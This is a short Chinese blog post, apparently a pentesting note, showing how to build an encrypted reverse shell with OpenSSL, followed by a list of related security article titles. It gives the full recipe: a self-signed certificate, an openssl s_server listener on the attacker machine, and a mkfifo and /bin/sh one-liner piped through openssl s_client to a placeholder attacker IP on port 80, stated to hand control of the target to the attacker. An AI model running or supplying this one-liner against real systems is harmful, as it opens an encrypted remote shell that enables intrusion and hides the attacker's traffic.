使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
内心如初21 小时前
13_等保系列之等保2.0流程标准
网络安全·等保测评·等保测评从0-1·等保测评笔记
Pure_White_Sword1 天前
bugku-reverse题目-树木的小秘密
网络安全·ctf·reverse·逆向工程
啥都想学点1 天前
kali基础介绍(Resource Development 资源开发)
网络安全
apocalypsx1 天前
CTF自学-SSRF(3)
web安全·网络安全
海星船长丶1 天前
预编译与sql注入,正则回溯绕过,mysql常见绕过,报错注入7大常用函数
服务器·数据库·sql·mysql·网络安全
内心如初1 天前
14_等保系列之安全管理体系建设思路
网络安全·等保测评·等保测评从0-1·等保测评笔记
半路_出家ren2 天前
3.python模拟勒索病毒
python·网络安全·密码学·网络攻击模型·base64·病毒·勒索病毒
不凉帅2 天前
NO.4信息安全技术基础知识
网络安全·信息安全·软考·高项·加密
one____dream2 天前
【网安】pwn-ret2shellcode
python·安全·网络安全·网络攻击模型
188号安全攻城狮2 天前
【PWN】HappyNewYearCTF_2_栈上变量覆写1
linux·运维·汇编·安全·网络安全